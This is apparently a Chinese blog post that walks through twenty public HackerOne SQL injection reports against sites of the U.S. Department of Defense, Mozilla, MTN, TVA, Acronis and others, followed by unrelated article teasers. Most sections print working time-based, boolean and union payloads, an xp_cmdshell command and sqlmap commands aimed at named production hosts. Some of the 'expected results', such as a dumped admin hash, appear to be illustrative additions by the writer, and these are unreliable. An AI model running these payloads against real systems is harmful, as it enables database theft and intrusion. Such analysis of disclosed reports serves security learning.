SQLI漏洞公开报告分析
文章目录
- 1. 闭合 ')
- 2. 邀请码|POST参数|时间盲注 | **PostgreSQL**
- 3. POST|order by参数|布尔盲注|Oracle
- 4. SOAP请求|MSSQL|布尔盲注
- 5. MySQL 时间盲注漏洞
- 6. GET|普通回显注入
- 7. ImpressCMS 1.4.2 | CVE | POST | 布尔盲注
- 8. Mysql | post | 布尔/时间盲注
- 9. 登录口 | post | mysql | 时间盲注
- 10. SQL Server | CVE | GET | 时间盲注
- 11. 登录口 | POST | Mysql | 时间盲注
- 12. 登录口 | POST | Mysql | 时间盲注
- 13. SQL Server | GET | 布尔盲注
- 14. Mysql | GET | 时间盲注
- 15. GET | Mysql | 布尔/时间盲注
- 漏洞入口:
- 自动化验证:
- 注入类型与 Payload:
- 数据库信息泄露:
- 16. COOKIE注入 | 普通回显型
- 漏洞验证请求示例:
- 17. GET | 报错注入 | SQL Server
- **漏洞验证与攻击路径**:
- 18. Mysql | GET | 时间盲注
- 漏洞描述:
- 漏洞验证请求(PoC):
- 19. POST | 时间盲注
- 复现步骤:
- Payload 有效示例(Sleep 3 秒):
- 对照请求(Sleep 0 秒):
- 复现结果:
- 20. Serendipity CMS | GET | 时间盲注
- 复现步骤:
1. 闭合 ')
MTN Group | Report #2958619 - SQLi | in URL paths | HackerOne
触发错误验证漏洞存在
-
假设原始URL中的
customerId
参数被用于如下查询:SELECT * FROM customers WHERE (id = '<输入的customerId>')
-
攻击者提交
customerId=123'
(末尾添加单引号),导致查询变为:SELECT * FROM customers WHERE (id = '123'') -- 语法错误:引号未闭合
-
数据库返回错误(如
Unclosed quotation mark
),证明输入未经过滤,漏洞存在。
2. 邀请码|POST参数|时间盲注 | PostgreSQL
Mozilla | Report #2209130 - SQL Injection on prod.oidc-proxy.prod.webservices.mozgcp.net via invite_code parameter - Mozilla social inscription | HackerOne
-
触发异常行为
-
请求示例:
POST /interaction/KTTbkN8LaJgYIb7fIwPYX/signup HTTP/2 Host: prod.oidc-proxy.prod.webservices.mozgcp.net ... invite_code=xxx' -- 添加单引号
-
响应结果:服务器返回
500 错误
(内部错误)。 -
二次测试:将单引号闭合为
invite_code=xxx''
,服务器返回200 成功
。 -
关键结论:输入未正确过滤,存在 SQL 注入风险。
-
-
时间盲注验证
-
Payload 构造:通过
PG_SLEEP
函数触发数据库延迟响应。invite_code=xxx');(SELECT 4564 FROM PG_SLEEP(5))--
-
执行效果:
- 数据库执行
PG_SLEEP(5)
,导致服务器响应延迟 5 秒。 - 同理,注入
PG_SLEEP(10)
和PG_SLEEP(20)
时,响应分别延迟 10 秒 和 20 秒。
- 数据库执行
-
技术原理:
');
:闭合原查询的括号和引号,终止合法语句。(SELECT ... FROM PG_SLEEP(N))
:注入自定义 SQL,强制数据库休眠N
秒。--
:注释符,忽略后续字符,避免语法错误。
-
-
自动化攻击可能性
-
使用工具如
sqlmap
可自动化利用此漏洞:sqlmap -u "https://prod.oidc-proxy.prod.webservices.mozgcp.net/interaction/..." --data="invite_code=xxx*" --dbms=postgresql --level=5
-
潜在风险:
- 提取数据库版本、表名、字段内容(如用户凭证)。
- 执行系统命令(需数据库权限配置不当)。
-
3. POST|order by参数|布尔盲注|Oracle
U.S. Dept Of Defense | Report #2081316 - Blind Sql Injection in https://█████/qsSearch.aspx | HackerOne
-
基础验证
-
原始请求:
POST /qsSearch.aspx HTTP/1.1 Host: ████████ ... HiddenFieldSortOrder=seqno -- 原始参数
-
正常响应:页面返回预期数据。
-
-
基于错误的条件盲注
-
Payload 1 - 探测用户名长度:
HiddenFieldSortOrder=seqno-DECODE(length(user),5,1,1/0)
- 攻击逻辑:
- 若
user
字段长度为 5,执行1
(正常返回)。 - 否则,触发
1/0
(除零错误,页面异常)。
- 若
- 观察结果:
- 当输入长度为5时,页面返回正常数据(确认用户名为5字符)。
- 攻击逻辑:
-
Payload 2 - 逐字符爆破用户名:
HiddenFieldSortOrder=seqno-DECODE(lpad(user,5),'QSWEB',1,1/0)
- 攻击逻辑:
lpad(user,5)
:将user
左填充至5字符(假设原始用户名为5字符)。- 若填充后等于
'QSWEB'
,执行1
(正常返回)。 - 否则,触发
1/0
(页面异常)。
- 观察结果:
- 输入
'QSWEB'
时页面正常,确认用户名为QSWEB
。 - 输入错误值(如
'QSWE1'
)时页面异常。
- 输入
- 攻击逻辑:
-
-
自动化攻击
-
使用 Burp Intruder 暴力枚举用户名:
-
模板配置:
HiddenFieldSortOrder=seqno-DECODE(lpad(user,5),'§a§',1,1/0)
- 将
§a§
设为爆破点,遍历5字符组合。
- 将
-
判断依据:
- 响应长度或状态码差异(正常用户名为200 OK,错误触发500)。
-
-
4. SOAP请求|MSSQL|布尔盲注
U.S. Dept Of Defense | Report #2072306 - Blind Sql Injection in https://████████/ | HackerOne
-
基础请求分析
-
原始 SOAP 请求:
<GetAllFacilitiesForNewUserRegistration><searchValue>*</searchValue> <!-- 正常通配符查询 --> </GetAllFacilitiesForNewUserRegistration>
运行 HTML
-
正常响应:返回所有匹配的设施列表(HTTP 200)。
-
-
布尔盲注验证
-
Payload 构造:
<searchValue>1' AND substring(system_user,1,16)='public\dsfwsuser' AND '%'='</searchValue>
运行 HTML
-
攻击逻辑:
- 若
system_user
前16字符为public\dsfwsuser
,条件成立,返回正常数据。 - 否则,查询无结果或返回异常(通过响应内容长度或状态码差异判断)。
- 若
-
观察结果:
- 当用户名为
public\dsfwsuser
时,页面返回预期数据。 - 输入错误值(如
'unknownuser'
)时,响应内容为空或异常。
- 当用户名为
-
-
自动化工具利用
-
使用
sqlmap
自动化注入(需携带有效会话 Cookie):sqlmap -r 11.txt --random-agent --batch --technique=B --dbms=mssql --force-ssl
-
关键参数:
--technique=B
:指定布尔盲注技术。--dbms=mssql
:声明目标数据库类型。
-
已确认信息:
- 数据库名称:
dsfdb
- 数据库用户:
public\dsfwsuser
- 数据库名称:
-
5. MySQL 时间盲注漏洞
U.S. Dept Of Defense | Report #2020429 - Blind Sql Injection https:/████████ | HackerOne
-
时间盲注验证
-
Payload 构造:
0' XOR (IF(now()=sysdate(), SLEEP(15), 0) XOR 'Z
-
攻击逻辑:
now()
与sysdate()
在 MySQL 中功能相同,条件恒为真。- 触发
SLEEP(15)
强制数据库休眠 15 秒。 - 通过响应时间判断注入是否成功。
-
测试结果:
Payload 响应延迟 0'XOR(IF(1=1,SLEEP(15),0)XOR'Z
15.896秒 0'XOR(IF(1=1,SLEEP(10),0)XOR'Z
10.740秒 0'XOR(IF(1=1,SLEEP(2),0)XOR'Z
2.714秒 0'XOR(IF(1=1,SLEEP(1),0)XOR'Z
1.927秒 -
结论:响应时间与
SLEEP
参数高度吻合,确认漏洞存在。
-
-
自动化工具利用
-
使用
sqlmap
进行自动化利用:sqlmap -u "https://██████/0*" --technique=T --dbms=mysql --time-sec=15
-
参数说明:
--technique=T
:指定时间盲注技术。--time-sec=15
:设置基准延迟时间。
-
6. GET|普通回显注入
[U.S. Dept Of Defense | Report #1628408 - SQL Injection at https://████████.asp (█████████) selMajcom] [HtUS] | HackerOne
-
基础验证
-
原始请求:
GET /█████mil/AFServices/RequestAccess.asp?selMajcom=MAT*&selbase=MXRD&Submitted=1 HTTP/1.1 Host: ██████████.████.net
-
正常响应:返回与
MAT*
匹配的军事单位列表(HTTP 200)。
-
-
自动化注入验证
-
保存请求文件:将包含 Cookie 和参数的请求保存为
dod.txt
。 -
使用 sqlmap 攻击:
sqlmap -r dod.txt --dbs --level 3 --risk 3 -v3
-
攻击结果:
available databases [24]: [*] ActivityManager -- 活动管理数据库 [*] AFServicesUsers -- 空军服务用户凭证库 [*] BaseProjects -- 军事基地项目数据 [*] W2DATA -- 工资及税务记录 [*] ██████████ -- 敏感军事资产数据库(名称脱敏) ...
-
-
手动注入验证
-
Payload 构造:
GET /RequestAccess.asp?selMajcom=MAT' UNION SELECT user,name FROM sys.sql_logins--
-
攻击逻辑:
- 闭合原查询参数
MAT*
,注入UNION SELECT
联合查询。 - 提取 SQL 登录账户信息(用户名为
sa
等高权限账户风险极高)。
- 闭合原查询参数
-
7. ImpressCMS 1.4.2 | CVE | POST | 布尔盲注
ImpressCMS | Report #1081145 - SQL Injection through /include/findusers.php | HackerOne
-
漏洞定位
-
问题代码:
// /include/findusers.php (行 281 和 294) $total = $user_handler->getUserCountByGroupLink(@$_POST["groups"], $criteria); $foundusers = $user_handler->getUsersByGroupLink(@$_POST["groups"], $criteria, TRUE);// icms_member_Handler 类方法 (行 469-471) if (!empty($groups)) {$sql[] = "m.groupid IN (" . implode(", ", $groups) . ")"; }
-
关键缺陷:
$_POST["groups"]
直接拼接至 SQL 查询,未进行整数类型验证或参数化处理。
-
-
攻击原理
-
Payload 构造示例:
POST /include/findusers.php HTTP/1.1 ... groups[]=1) OR (SELECT SUBSTR(password,1,1) FROM users WHERE uid=1)='a' --
-
解析后的 SQL:
SELECT DISTINCT u.* FROM icms_users AS u LEFT JOIN icms_groups_users_link AS m ON m.uid = u.uid WHERE 1 = '1' AND m.groupid IN (1) OR (SELECT SUBSTR(password,1,1) FROM users WHERE uid=1)='a' -- )
-
攻击效果:
- 若管理员密码哈希首字符为
a
,查询返回用户列表;否则返回空。通过布尔响应差异推断数据。
- 若管理员密码哈希首字符为
-
-
未授权利用条件
- 依赖漏洞:#1081137(如 CSRF 令牌绕过或会话固定),允许攻击者未认证调用
findusers.php
。
- 依赖漏洞:#1081137(如 CSRF 令牌绕过或会话固定),允许攻击者未认证调用
8. Mysql | post | 布尔/时间盲注
[U.S. Dept Of Defense | Report #1627995 - SQL injection at https://█████████] [HtUS] | HackerOne
-
漏洞定位
-
攻击目标:
staff_student
参数(POST 请求) -
请求示例:
http
复制
POST /olc/███comments/comment_post.php HTTP/1.1 ... staff_student=STUDENT&scn=xxx&comments=xx&Submit=Submit+Comments
-
-
自动化验证(sqlmap)
-
命令执行:
bash
复制
sqlmap -u "https://███████" --data="staff_student=STUDENT&scn=xxx..." -p staff_student --dbms=mysql --dbs
-
关键结果:
plaintext
复制
available databases [13]: [*] █████████ -- 核心业务数据库(名称脱敏) [*] ██████mobile -- 移动端用户数据 [*] LEAM -- 教育培训管理系统 [*] mysql -- MySQL 系统表(含账户信息) [*] testusers -- 测试用户凭证库 ...
-
-
手动验证(布尔盲注示例)
-
Payload 构造:
http
复制
staff_student=STUDENT' AND (SELECT SUBSTR(database(),1,1)='a')--
-
响应差异:
- 若当前数据库首字符为
a
,页面返回正常内容。 - 否则返回错误或空数据。
- 若当前数据库首字符为
-
9. 登录口 | post | mysql | 时间盲注
[U.S. Dept Of Defense | Report #1627970 - time based SQL injection at https://███] [HtUS] | HackerOne
-
时间盲注手动验证
-
恶意 Payload:
POST /olc/setlogin.php HTTP/1.1 ... username=█████████'+(SELECT*FROM(SELECT(SLEEP(5)))a)+'&password=██████
-
关键特征:
- 响应时间固定延迟 5 秒(与
SLEEP
参数严格匹配) - HTTP 状态码 302 重定向(需忽略跳转以观测注入效果)
- 响应时间固定延迟 5 秒(与
-
-
自动化验证(sqlmap)
-
命令执行:
sqlmap -u "https://www.████████" --data="username=test&password=123" -p username --dbms=mysql --dbs
-
关键结果:
available databases [13]: [*] ███ -- 核心业务库(脱敏) [*] ██████mobile -- 移动端用户数据 [*] LEAM -- 教育培训系统 [*] mysql -- 系统账户库(含 root 哈希) [*] testusers -- 测试账户库 ...
-
10. SQL Server | CVE | GET | 时间盲注
Tennessee Valley Authority | Report #1125752 - SQL Injection on https://soa-accp.glbx.tva.gov/ via “/api/” path - VI-21-015 | HackerOne
-
信息泄露验证
-
获取主机名:
GET /api/river/observed-data/GVDA1'/*!50000union*/SELECT+HOST_NAME()--+- HTTP/1.1 Host: soa-accp.glbx.tva.gov
响应结果:返回数据库服务器主机名(如
SQLSVR-PROD-01
)。 -
提取数据库版本:
GET /api/river/observed-data/GVDA1'/*!50000union*/SELECT+@@version--+- HTTP/1.1
响应结果:
Microsoft SQL Server 2017 (RTM-CU22-GDR) 14.0.3370.1 (X64) Windows Server 2012 R2 Standard 6.3 (Build 9600)
-
-
时间盲注验证
-
触发 10 秒延迟:
time curl -k "https://soa-accp.glbx.tva.gov/api/river/observed-data/-GVDA1'WAITFOR DELAY'0:0:10'--+-"
关键特征:响应时间固定延迟 10 秒,确认漏洞存在。
-
11. 登录口 | POST | Mysql | 时间盲注
Acronis | Report #1224660 - bypass sql injection #1109311 | HackerOne
-
手动验证(时间盲注)
-
Payload 构造:
POST /wp-login.php HTTP/2 Host: www.acronis.cz ... log=0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z&pwd=...
-
关键特征:
- 当
sleep(10)
注入时,响应时间固定延迟 12 秒(与网络波动无关)。 - 其他
sleep
参数(如sleep(3)
)同样呈现严格时间关联性(见 PoC 截图 {F1335267})。
- 当
-
-
自动化验证(sqlmap)
-
命令示例:
sqlmap -u "https://www.acronis.cz/wp-login.php" --data="log=test&pwd=123" -p log --dbms=mysql --technique=T
-
预期结果:
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: log=test' AND (SELECT 1234 FROM (SELECT(SLEEP(10)))qQlQ) AND 'a'='a&pwd=123
-
12. 登录口 | POST | Mysql | 时间盲注
MTN Group | Report #1069531 - Blind SQL Injection | HackerOne
-
手动验证(时间盲注)
-
Payload 构造:
POST /signin/ HTTP/1.1 Host: futexpert.mtngbissau.com ... phone_number=0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z&pin=1&submit=Continuar
-
关键特征:
- 当
sleep(12)
注入时,响应时间固定延迟 12 秒以上(网络延迟误差范围内)。 now()
与sysdate()
在 MySQL 中功能相同,条件恒为真,确保攻击稳定性。
- 当
-
-
自动化利用(sqlmap)
-
命令示例:
sqlmap -u "https://futexpert.mtngbissau.com/signin/" \ --data="phone_number=0&pin=1&submit=Continuar" \ -p phone_number --dbms=mysql --technique=T --time-sec=12
-
预期结果:
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: phone_number=0' AND (SELECT 9274 FROM (SELECT(SLEEP(12)))zHqJ) AND 'a'='a&pin=1&submit=Continuar
-
13. SQL Server | GET | 布尔盲注
U.S. Dept Of Defense | Report #1250293 - SQL injection my method -1 OR 321=6 AND 000159=000159 | HackerOne
-
布尔逻辑测试
-
Payload 构造:
sDirID=-1 OR 3*2*1=6 AND 000159=000159
-
关键特征:
- 当布尔条件为真(如
3*2=6
)时,页面返回正常业务数据(原始值 51)。 - 当条件为假(如
3*2=5
)时,返回空数据或异常状态码。
- 当布尔条件为真(如
-
攻击扩展:
sDirID=-1 OR (SELECT TOP 1 SUBSTRING(username,1,1) FROM users)='a'
- 若管理员用户名首字母为
a
,返回有效数据,否则异常。
- 若管理员用户名首字母为
-
-
自动化利用(sqlmap)
-
命令示例:
sqlmap -r request.txt --batch --dbms=mssql --technique=B --dump -T users
-
预期结果:
Database: ██████ Table: users [1 entry] +----+----------+------------------+ | id | username | password_hash | +----+----------+------------------+ | 1 | admin | 5f4dcc3b5aa765...| +----+----------+------------------+
-
14. Mysql | GET | 时间盲注
Uber | Report #476150 - SQLI on desafio5estrelas.com | HackerOne
15. GET | Mysql | 布尔/时间盲注
Automattic | Report #1069561 - SQL Injection intensedebate.com | HackerOne
漏洞入口:
- 参数位置:
GET
参数 - 可疑参数:
acctid
自动化验证:
使用 sqlmap 工具进行自动化检测与验证,命令如下:
sqlmap --url https://www.intensedebate.com/js/importStatus.php?acctid=1 --dbs
注入类型与 Payload:
-
布尔盲注
acctid=1 AND 1726=1726
当注入条件为真时页面响应正常,条件为假时响应异常,证明存在 SQL 注入。
-
时间盲注
sql复制编辑 acctid=1 AND (SELECT 8327 FROM (SELECT(SLEEP(5)))yrDl)
页面响应延迟约 5 秒,进一步确认数据库执行了 sleep 函数,证明为可控 SQL 执行环境。
数据库信息泄露:
sqlmap 自动获取到以下数据库:
plaintext复制编辑[*] heartbeat
[*] id_comments
[*] information_schema
此信息表明攻击者可枚举系统中全部数据库结构并进行进一步攻击。
16. COOKIE注入 | 普通回显型
MTN Group | Report #761304 - SQL Injection on cookie parameter | HackerOne
漏洞验证请求示例:
http复制编辑GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en'; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1
验证行为:
- 注入
'
(单引号)后,页面返回 SQL 错误,显示语法异常。 - 注入
''
(闭合引号)后,页面恢复正常响应。
说明服务端在处理 Cookie 中的 lang
参数时,存在 SQL 拼接风险。
目前仅做了探测性测试,未尝试进一步数据读取或利用,请求许可后可进行下一步漏洞确认。
17. GET | 报错注入 | SQL Server
U.S. Dept Of Defense | Report #227102 - Two Error-Based SQLi in courses.aspx on ██████████ | HackerOne
漏洞验证与攻击路径:
-
触发错误泄露信息
-
Payload 1(换行符注入):
GET /onlinecatalog/courses.aspx?crs_id=%0a HTTP/1.1
响应结果:
Error converting data type varchar to numeric. Source Error: Line 174 - rscrs.open(sqlcrs, connectionString)
-
Payload 2(无效数值注入):
GET /onlinecatalog/courses.aspx?crs_id=0 HTTP/1.1
响应结果:
Either BOF or EOF is True... Source Error: Line 177 - crs = rscrs("crs_header").value
-
-
攻击扩展风险
-
信息泄露:通过错误回显获取表结构,构建精准注入 Payload。
-
联合查询注入:利用已知表名提取敏感数据:
crs_id=1 UNION SELECT username, password FROM users--
-
系统命令执行(需高权限配置):
crs_id=1; EXEC xp_cmdshell 'whoami'--
-
18. Mysql | GET | 时间盲注
Rocket.Chat | Report #433792 - Blind SQL injection in third-party software, that allows to reveal user statistic from rocket.chat and possibly hack into the rocketchat.agilecrm.com | HackerOne
漏洞描述:
在访问 Rocket.Chat 静态主页 https://rocket.chat/
时,页面加载了第三方统计服务:
https://stats2.agilecrm.com/addstats?...
通过对该 URL 的参数 fuzzing 测试,发现其中 new
参数存在 盲注(Blind SQL Injection)漏洞。攻击者可利用该漏洞注入 SQL 语句,实现数据延时判断、数据库结构探测,进一步导致敏感信息泄露甚至系统控制风险。
漏洞验证请求(PoC):
http复制编辑GET /addstats?callback=json949659033379064&guid=f0d3738c-44c0-60a6-44b6-56e14ca30872&sid=2172c2ca-15b6-49c8-052d-b7d817cd280b&url=https%3A%2F%2Frocket.chat%2F&agile=8pat9ou8gh0thqd8dlgctje3go&new=(select*from(select(sleep(5)))a)&ref=&domain=dorgam HTTP/1.1
Host: stats2.agilecrm.com
Connection: close
若后端存在注入漏洞,执行
SLEEP(5)
后响应将延迟约 5 秒,实际测试结果为 页面加载延时 5 秒,确认存在基于时间的盲注(Time-Based Blind SQL Injection)。
19. POST | 时间盲注
U.S. Dept Of Defense | Report #348047 - Code reversion allowing SQLI again in ███████ | HackerOne
复现步骤:
对以下接口提交 POST 请求,通过对 userid
参数注入 payload,可以观察到明显的响应延迟:
Payload 有效示例(Sleep 3 秒):
makefile复制编辑POST /elist/email_aba.php HTTP/1.1
Host: ████████
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=xxxx
...Body:
lname=S&userid=admin'+(select*from(select(sleep(3)))a)+'&pw=admin
对照请求(Sleep 0 秒):
makefile复制编辑POST /elist/email_aba.php HTTP/1.1
Host: ████████
...Body:
lname=S&userid=admin'+(select*from(select(sleep(0)))a)+'&pw=admin
复现结果:
sleep(3)
请求明显延迟响应;sleep(0)
请求无延迟;- 可据此判断目标站点后端存在时间盲注型 SQL 注入。
20. Serendipity CMS | GET | 时间盲注
Hanno’s projects | Report #374027 - blind sql injection | HackerOne
复现步骤:
-
普通请求示例:
https://betterscience.org/plugin/tag/peerj
返回带有 peerj 标签的文章。
-
注入测试请求:
替换peerj
为 SQL 注入 payload,例如:https://betterscience.org/plugin/tag/if(now()=sysdate(),sleep(6),0)/*...*/
-
多次请求对比响应时间:
Payload 响应时间 if(now()=sysdate(),sleep(3),0)
3.2s if(now()=sysdate(),sleep(9),0)
9.3s if(now()=sysdate(),sleep(0),0)
0.2s 明显存在时间差异,说明 SQL 被注入执行。
相关文章:
SQLI漏洞公开报告分析
文章目录 1. 闭合 )2. 邀请码|POST参数|时间盲注 | **PostgreSQL**3. POST|order by参数|布尔盲注|Oracle4. SOAP请求|MSSQL|布尔盲注5. MySQL 时间盲注漏洞6. GET|普通回显注入7. ImpressCMS 1.4.2 | CVE | POST | 布尔盲注8. Mysql | post | 布尔/时间盲注9. 登录口 | post |…...
并行和并发有什么区别?
1. 定义 并行是在同一时刻执行多个任务。并发是在相同的时间段内执行多个任务,任务可能交替执行,通过调度实现。 2. 区别 执行方式: 并发:多个任务交替进行,任务并不一定同时执行,只是在同一时间段内处理…...
Elasticsearch 全面解析
Elasticsearch 全面解析 前言一、简介核心特性应用场景 二、核心原理与架构设计1. 倒排索引(Inverted Index)2. 分片与副本机制(Sharding & Replication)3. 节点角色与集群管理 三、核心特点1. 灵活的查询语言(Que…...
SQL 中的 NULL 处理
NULL 在 SQL 中表示缺失、未知或不适用的数据值,它与空字符串或零值不同。SQL 对 NULL 有特殊的处理规则: NULL 的基本特性 比较运算:任何与 NULL 的比较都返回 UNKNOWN(既不是 TRUE 也不是 FALSE) SELECT * FROM tab…...
2025常用的ETL 产品推荐:助力企业激活数据价值
在当今数字化时代,企业面临着海量数据的挑战与机遇,ETL(Extract, Transform, Load)工具作为数据整合与分析的关键环节,其重要性日益凸显。ETL 厂商众多,各有优势,本文将从多个维度进行分析&…...
深入解析:Python 爬取淘宝商品券后价
在电商领域,淘宝作为国内领先的电商平台,拥有海量的商品和丰富的优惠活动。对于技术开发者来说,获取淘宝商品的券后价是实现电商应用功能的重要环节。本文将详细介绍如何通过淘宝开放平台的 API 接口获取商品的券后价,并提供实际的…...
25.4.10学习总结
关于消除警告 警告: Loading FXML document with JavaFX API of version 23.0.1 by JavaFX runtime of version 17.0.6 对应这条警告,我的处理方式是,将IDEA的默认javaFX的库换成自己下载的javaFX的库。 我用的javaFX的库如下: javaFX-24…...
【XML基础-2】深入理解XML中的语义约束:DTD详解
XML(可扩展标记语言)作为数据交换的标准格式,在Web服务和应用程序间数据传递中扮演着重要角色。而确保XML文档结构正确性和语义一致性的关键,就在于文档类型定义(DTD)。本文将全面解析DTD的概念、语法结构、…...
SkyWalking + ELK 全链路监控系统整合指南
一、架构设计图 二、核心组件部署 1. SkyWalking 集群部署 yaml: # docker-compose-skywalking.yml version: 3.8services:oap:image: apache/skywalking-oap-server:9.7.0ports:- "11800:11800" # gRPC- "12800:12800" # HTTPenvironment:SW_STORAGE: …...
LeetCode hot 100—编辑距离
题目 给你两个单词 word1 和 word2, 请返回将 word1 转换成 word2 所使用的最少操作数 。 你可以对一个单词进行如下三种操作: 插入一个字符删除一个字符替换一个字符 示例 示例 1: 输入:word1 "horse", word2 &q…...
SAP系统年终结算出错
问题描述:2024年采购订单发票校验过账到2024年时提示错误如下: 问题原因:2024年全部未结束的采购申请和订单被结转到2025年。 解决方法:用事务代码FMJ3冲销此采购订单结转。...
在 Dev-C++中编译运行GUI 程序介绍(二)示例:祝福程序
在 Dev-C中编译运行GUI 程序介绍(二)示例:祝福程序 前期见: 在 Dev-C中编译运行GUI 程序介绍(一)基础 https://blog.csdn.net/cnds123/article/details/147019078 示例1、祝福程序 本文中的这个祝福程序是…...
Uniapp使用onShow语法报before initialization
一、错误原因分析 函数未完成初始化时被调用 • 当你在 onShow 生命周期中调用 getUserMessagePlan() 时,如果该函数的定义位于调用代码的下方(如示例中的顺序),JavaScript 引擎会因 变量提升规则 抛出此错误。 • 示例代码结构&a…...
大模型在儿童急性淋巴细胞白血病(ALL)-初治患者诊疗中应用的研究报告
目录 一、绪论 1.1 研究背景与意义 1.2 国内外研究现状 1.3 研究目的与内容 二、大模型技术与儿童 ALL 相关知识 2.1 大模型技术原理与特点 2.2 儿童 ALL 的病理生理与诊疗现状 三、术前风险预测与手术方案制定 3.1 术前数据收集与预处理 3.2 大模型预测术前风险 3.…...
如何选择适合机床的丝杆支撑座型号?
在机床中选择丝杆支撑座型号时,需综合考虑机械性能、安装条件及应用需求,接下来我们一起来看看详细的选型指南! 1、适配性:丝杆支撑座应与所使用的滚珠丝杆完全适配,确保两者在尺寸、规格、性能等方面相互匹配。 2…...
「The Road to Web3 Cloud」香港活动回顾|波卡的 Web3 Cloud 愿景
在区块链基础设施的发展浪潮中,Polkadot 正在迈出决定性的一步:打造一个属于 Web3 的 “云服务平台”。如果说 Bitcoin 创造了一个计算器,以太坊创造了一个计算机,那么 Polkadot 正在做的则是构建链上的 “云服务器”。它的目标是…...
PostgreSQL-容器运行时索引修复
在 Docker 中运行的 PostgreSQL 数据库如果索引损坏,可以通过以下步骤进行修复。索引损坏可能会导致查询性能下降或数据不一致,因此需要及时处理。 1. 进入 PostgreSQL 容器 首先,进入运行 PostgreSQL 的 Docker 容器: <BASH&…...
Vanna + qwq32b 实现 text2SQL
Vanna 是一个开源的 Text-2-SQL 框架,主要用于通过自然语言生成 SQL 查询,它基于 RAG(Retrieval-Augmented Generation,检索增强生成)技术。Vanna 的核心功能是通过训练一个模型(基于数据库的元数据和用户提…...
100V5A同步降压大功率芯片WD5105:高效电源管理的卓越之选
100V5A同步降压大功率芯片WD5105:高效电源管理的卓越之选 在现代电子设备的复杂电源架构中,对高效、稳定且可靠的电源管理芯片需求日益增长。WD5105作为一款100V5A同步降压大功率芯片,凭借其出色的性能、全面的保护机制以及广泛的应用适应性…...
springboot中测试python脚本:ProcessBuilder
目录 一.添加Jython依赖 二.使用步骤 1. 创建 ProcessBuilder 实例 2. 设置工作目录(可选) 3. 合并错误流(可选) 4. 启动进程 5. 处理输入输出流 6. 等待进程完成 7.完整案例 三.注意事项 ProcessBuilder是jdk提供的脚本…...
Google Chrome下载受限制的解决方案【方法指南】
在国内使用网络时,部分用户在尝试访问Google Chrome官网下载谷歌浏览器时,常常遇到网页无法打开或文件下载失败的情况。这种下载受限制的问题多由网络访问政策或DNS解析异常导致。为了正常获取Google Chrome的最新版安装程序,用户需要通过一些…...
mysql-锁的算法(记录锁、间隙锁、临键锁)
1.行锁的三种算法 有3种行锁算法,分别是: Record Lock:单个行记录上的锁,没有主键,会使用隐式的主键进行锁定Gap Lock:间隙锁,锁定一个范围,但不包含记录本身Next-Key Lock&#x…...
SAP Business One系统标准功能之外的不允许负库存控制
SqlServer版本写法: --在存储过程SBO_SP_TransactionNotification里加上这段代码,记得定义一个全局变量用于接收提醒具体是哪个物料 IF transaction_type IN (A) BEGINIF EXISTS (SELECT 1 FROM OIVL T0INNER JOIN OITW T1 ON T0.ItemCode T1.ItemCode…...
AI与5G的融合:如何实现更快速、更智能的物联网应用?
引言 AI和5G的结合,正在加速物联网(IoT)应用的发展,让万物互联变得更加智能、高效。5G提供超高速率、低时延和海量连接的网络能力,而AI则赋予物联网设备更强的数据分析、预测和自动决策能力。当AI与5G融合,…...
Redis的哨兵
Redis的哨兵 Sentinel 一.哨兵概念1.相关名词解释图 二.主节点恢复方式1.人工恢复主节点故障流程图2.哨兵自动恢复主节点流程 三.使用docker搭建环境1.安装docker-compose2.安装docker3.停止之前的redis服务器4.使用docker获取到redis的镜像5.使用docker-compose进行容器编排创…...
初识Redis · 简单理解Redis
目录 前言: 分布式系统 开源节流 认识Redis 负载均衡 缓存 微服务 前言: 本文只是作为Redis的一篇杂谈,简单理解一下Redis为什么要存在,以及它能做到和它不能做到的事儿,简单提及一下它对应的优势有什么&#…...
Python设计模式-抽象工厂模式
1. 什么是抽象工厂模式 抽象工厂模式(Abstract Factory Pattern)是一种创建型设计模式,它提供了一种方式来创建一系列相关或相互依赖的对象,而无需指定它们具体的类。这种模式是所有形式的工厂模式中最为抽象和最具一般性的一种。…...
【中检在线-注册安全分析报告】
前言 由于网站注册入口容易被黑客攻击,存在如下安全问题: 1. 暴力破解密码,造成用户信息泄露 2. 短信盗刷的安全问题,影响业务及导致用户投诉 3. 带来经济损失,尤其是后付费客户,风险巨大,造…...
第16届蓝桥杯单片机模拟试题Ⅲ
试题 代码 sys.h #ifndef __SYS_H__ #define __SYS_H__#include <STC15F2K60S2.H> //sys.c extern unsigned char UI; //界面标志(0湿度界面、1参数界面、2时间界面) extern unsigned char time; //时间间隔(1s~10S) extern bit ssflag; //启动/停止标志…...
软件系统安全设计方案,信息化安全建设方案(Word原件)
1.1 总体设计 1.1.1 设计原则 1.2 物理层安全 1.2.1 机房建设安全 1.2.2 电气安全特性 1.2.3 设备安全 1.2.4 介质安全措施 1.3 网络层安全 1.3.1 网络结构安全 1.3.2 划分子网络 1.3.3 异常流量管理 1.3.4 网络安全审计 1.3.5 网络访问控制 1.3.6 完…...
UE5 尝试接入 C# 脚本方案
最近团结替代 Unity6 的事官宣了,只能唏嘘不已,顺带的也就研究了一下在 UE5 中接入 C# 的方案,也算是提前帮广大 Unity 开发者蹚一下转 UE 的路~ 当前我发现的,维护比较勤快的 UE C# 方案有2个,UnrealCSharp 和 Unrea…...
力扣hot100 81-90记录
81-90(动态规划) leetcodehot100 81: class Solution { public:int climbStairs(int n) {int p 0, q 0, count 1;for(int i 1; i < n; i){p q; q count;count p q;}return count;} };//81class Solution { public:vector<vect…...
深入解析以太坊虚拟机(EVM)架构与状态机特性
